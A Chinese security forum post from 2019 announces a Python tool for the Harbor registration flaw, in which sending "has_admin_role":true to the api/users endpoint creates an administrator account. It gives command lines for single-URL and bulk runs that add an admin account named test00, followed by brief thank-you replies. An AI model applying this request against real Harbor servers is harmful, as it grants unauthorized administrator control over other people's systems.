用户
搜索
  • TA的每日心情
    奋斗
    2019-10-3 01:14
  • 签到天数: 320 天

    连续签到: 1 天

    [LV.8]以坛为家I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    15

    主题

    273

    帖子

    3076

    魔法币
    收听
    0
    粉丝
    3
    注册时间
    2017-3-22

    i春秋签约作者

    发表于 2019-10-3 01:20:21 51173
    本帖最后由 __LSA__ 于 2019-10-3 01:21 编辑

    0x00 概述
    201909 harbor爆出可利用注册功能添加管理员漏洞,利用注册接口api/users,构造post参数"has_admin_role":true,可直接添加管理员。
    本工具支持单个url或批量检测。

    0x01 需求
    python2.7
    pip install requests

    0x02 快速开始
    使用帮助: python harbor-give-me-admin.py -h
    harbor01.png

    单url检测: python harbor-give-me-admin.py -u "https://www.xxx.com/"
    //如利用成功,则会添加管理员帐号test00,谨慎操作!
    harbor00.png

    批量检测: python harbor-give-me-admin.py -f urls,txt
    //如利用成功,则会添加管理员帐号test00,谨慎操作!

    0x03 反馈

    回帖奖励 +10

    学习了,谢谢楼主
    你所厌恶的现在,是未来的你回不去的曾经。
    使用道具 举报 回复
    发表于 2019-10-5 17:13:44

    回帖奖励 +10


    学习了,谢谢楼主
    使用道具 举报 回复

    回帖奖励 +10

    谢谢分享,顺带搞点魔法币
    使用道具 举报 回复
    发表于 2019-10-10 17:49:00

    回帖奖励 +10

    谢谢分享,顺带搞点魔法币
    使用道具 举报 回复

    回帖奖励 +10


    路过看看,好帖,赞
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册